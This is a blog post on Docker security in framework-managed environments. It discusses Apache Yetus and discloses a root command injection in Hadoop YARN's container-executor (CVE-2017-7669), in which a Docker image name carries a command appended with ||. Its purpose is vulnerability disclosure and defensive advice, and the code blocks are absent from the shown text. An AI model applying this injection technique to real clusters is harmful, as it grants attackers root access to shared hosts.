Docker Security in Framework Managed, Multi-user Environments

By | 2017-06-02

A while back, Jessie Frazelle wrote and published an informative blog post on the differences between containers, zones, and jails. Since it touched on security, the blog post reminded me of a conversation that was had last year when a contributor to the Apache Yetus project asked about this blog post about one of the bigger security issues with regards to using Docker.

The TL;DR of the issue is that anything permitted usage of dockerd’s socket is allowed to mount root or any other file system that the daemon can also access. The solution provided in the Project Atomic (aka Red Hat) blog was mainly about the idea that one should just use sudo to limit the damage. In other words, wrap the docker command such that it specifies all the parameters. Additionally, they proposed the idea that dockerd should do some authorization to limit who can access dockerd.

For many deployments, this proposed solution of using sudo probably works well. But for others, the usage of Docker and Linux containers is effectively, and much to Frazelle’s point, as a pseudo-VM solution. In fact, a growing number of frameworks that manage containers call the ‘docker’ executable directly and need more control over the command line to function properly. The sudo solution in these cases either doesn’t work or must be exercised with caution.

When using a framework, understand how it works and what those security issues might be!

Let’s talk about two of them.

Use Case 1: Apache Yetus

Apache Yetus is a set of independent libraries and tools to ultimately help the development process. They are particularly useful for large or open source projects where the community is distributed geographically making it impractical to get everyone in the same room. One of its features is something called precommit. It is primarily used to QA patches and give feedback to humans not only on unit tests but also code formatting and other measures of quality. Since Apache Yetus is designed for usage by lots of different projects that likely have different software requirements, it is logical to use something like Docker to provide those prerequisites.

The typical trigger for precommit is from within Jenkins based upon changes from a bug tracking system such as JIRA or Github issues. The command line parameters, minus the bug tracking system reference, are typically hard-coded as part of the Jenkins job. There is little-to-no direct user interaction. This makes most of the attack surface come mainly come from the Jenkins environment and the user patch itself.

Apache Yetus deployments often use Docker. It is typical for a development project to include a Dockerfile in their source tree for QA work. As a project adds new requirements, modifying the build image is very simple since the Dockerfile can get altered in the same commit. As a result, it isn’t unusual for patches that need testing to also make changes to the Dockerfile–part of our potential attack service.

If we greatly simplify how precommit works and its internal processes, it typically looks like this:

  1. prework
  2. rewrite the Dockerfile to include some Yetus-specific bits
  3. docker build the Dockerfile
  4. docker build + custom bits for this run
  5. docker run, re-executing inside the container
  6. reset the source tree and do testing
  7. results

Step 5 is where the magic happens. The docker run command has a few custom volumes so that the build process has access to the source tree, artifact directories, maven cache directory, etc.

This process gives us great flexibility and allows a nice balance between static and dynamic needs. Unfortunately, this also makes the common solution of using sudo to protect the Docker command line difficult. Apache Yetus requires a lot more control over the volume parameters than what a typical user would need. In particular, it mounts the source tree and various support directories inside the container. In the majority of deployments, patches are only permitted to change the Dockerfile and not the Apache Yetus deployment itself. Mounting host-based file systems (such as /) is not supported from within Dockerfiles, so there is no direct exposure to the external environment. That leaves the problem of stuff that can happen inside the Dockerfile (e.g., remote ssh, DoS, bugs in containers, etc.). Given that we are effectively running user-provided code (as executed by the build system), those problems exist regardless of Docker being there or not.

What would happen if a user does break in via a hole in Jenkins? Apache Yetus expects to be able to call the docker command or an equivalent via a flag. The equivalent command could be used to provide filtering of options as necessary. Don’t want someone mounting / inside the container? Then build a filter for it. This situation is less than ideal but better than nothing.

It’s worth mentioning, however, that Apache Yetus does have a known issue where passwords are currently stored in environment variables. YETUS-504 tracks a fix.

Use Case 2: Apache Hadoop

Apache Hadoop, by proper definition, is a file system (HDFS), an execution engine (YARN), a MapReduce implementation, and some common glue. There have been two attempts to add Docker support to YARN, with the latest being tracked by YARN-3611. The first release to feature parts of this changes was Apache Hadoop 3.0.0-alpha1. (For the examples below, I will be using 3.0.0-alpha2.) It is crucial to note that this feature is considered pre-production and very experimental in quality.

One particular benefit of this version is the ability for users to specify an image within which to run their job. The command line, after a bit of server setup, looks something like this:

This example runs the pi code in an image called ‘image’.

If we greatly simplify it, under the hood the following is happening:

  1. user submits job specifying docker image name
  2. NodeManager sets up environment, creating directories, downloading image, etc.
  3. NodeManager spawns container-executor to finish setup
  4. NodeManager creates a shell script for the container-executor to launch
  5. NodeManager spawns container-executor to use the Docker launch script
  6. container-executor (running as root) runs the Docker launch script

On the surface, this looks somewhat reasonable. But it’s important to recognize that container-executor is a setuid program. For those types of programs, input validation matters. Where can we inject our custom input? The obvious attack vector is the shell script. User input as part of running a bash program as root is dangerous and a significant security anti-pattern.

Let’s start breaking this process down on a test system by first creating a wrapper. Move container-executor to ce-real, duplicating permissions as you go along. Then create a new container-executor program:

With this wrapper in place, container-executor parameters are now appended to the /tmp/logfile. We’re particularly interested in #4’s like this one:

Read the source for more details on these parameters. For this exercise, concentrate on the second-to-last one: /tmp/hadoop-yarn/nm-docker-cmds/docker.container_1494886798647_0002_02_0000019129944638078956831.cmd.

YARN does not ever delete this file. Let’s open up this Denial of Service attack-in-waiting and see what it is:

(for clarity, I’ve inserted some breaks)

These are the command line arguments passed to the docker command. The NodeManager builds the file and not the container-executor itself. This design means we can write our shell script and have it executed.

container-executor requires a particular directory structure and must be executed as the YARN user. Using an existing container makes this easier. For now, go ahead and switch to that user account. (Breaking into yarn is left as a different exercise.) Become the YARN user, then we’ll do some manual setup so we can execute some things:

Now, let’s create our new script:

The actual parameters after the run do not really matter that much. In this specific example, the docker command will fail, but that’s ok. It will still run our ‘touch /tmp/neato’ as root:

You’ll get the docker usage message and some other stuff but it doesn’t matter:

OK, so we can run whatever we want as root. But that seems overly complicated. Is there an easier way? Why yes, yes there is. Due to the lack of input validation, a user can pass whatever they want directly from the CLI:

… and then verification:

… and there’s our file.

So how did this work? Effectively, the value for YARN_CONTAINER_RUNTIME_DOCKER_IMAGE passes through YARN’s RPC system to the NodeManager. The NodeManager then writes this value unscathed into the previously mentioned shell script. Before dropping root privileges, container-executor runs this shell script as root. The script ends up looking a lot like the one above. Effectively a version of:

In bash, || is the “or” operator. Since the first command failed, it then executes the code after the ||. In our hack above, this was a simple file creation. Top level privileges expose full access to all system resources. We could have chosen to wipe out the entire OS (including the local logs), covering our tracks fairly effectively.

These discoveries while writing this blog post turned into CVE-2017-7669. In the case of Apache Hadoop 3.0.0-alpha1 (and any other distributions that have YARN-3853 but not YARN-5704), there is no way to disable the Docker functionality. That means this security hole is ever present.

Over a month after disclosing the vulnerability to the ASF, Apache Hadoop 3.0.0-alpha3 (with Apache Hadoop 2.8.1 coming soon) has been released primarily to fix these high impact security holes. Now YARN sanitizes Docker image names before writing the shell script. Some parameters are now classified as required, and single quotes surround all values for those parameters. However, there is no validation of the actual parameters being safe or valid. For example, it’s possible to add or remove capabilities, mount various directories, change the user, and more.

Like Apache Yetus, Apache Hadoop does support configuring the docker command via the undocumented docker.binary setting in container-executor.cfg. This setting allows one to put in a filter to prevent harmful settings.

Commonality

The sudo trick doesn’t always work for every situation. There is a very real need for some sort of ACL system at the system level for Docker. While I have mainly focused on the docker command itself, this also applies to talking to dockerd directly.

Therefore, in addition to the authentication as proposed by Red Hat, users also need capabilities to limit access to certain resources post-authentication. For example, “a white list for directories usable in volumes by these users” would go a long way in preventing accidental exposure. Longer term, an application that takes a raw Dockerfile and (quickly) turns it into an actual VM would be of tremendous benefit.

Some Advice

Docker is easily weaponized, and developers integrating with it need to be aware. Security must be at the forefront when working in multi-user environments. They should be honest with their user base about potential risks and shortcomings to prevent intrusions. It is important to acknowledge that this is a fast-changing technology. Mistakes will be made as the features and capabilities change on a seemingly weekly basis.

Most importantly, administrators need to consider the risks of framework holes. Users need to hold their suppliers (both open source and commercial) on stability and security information when dealing with Docker in these types of scenarios. For example, for Hadoop, the question is not “does feature x work with security” but “is feature x secure?”. Bugs happen, but issues in this space have a lot of risks. Plan accordingly!

Leave a Reply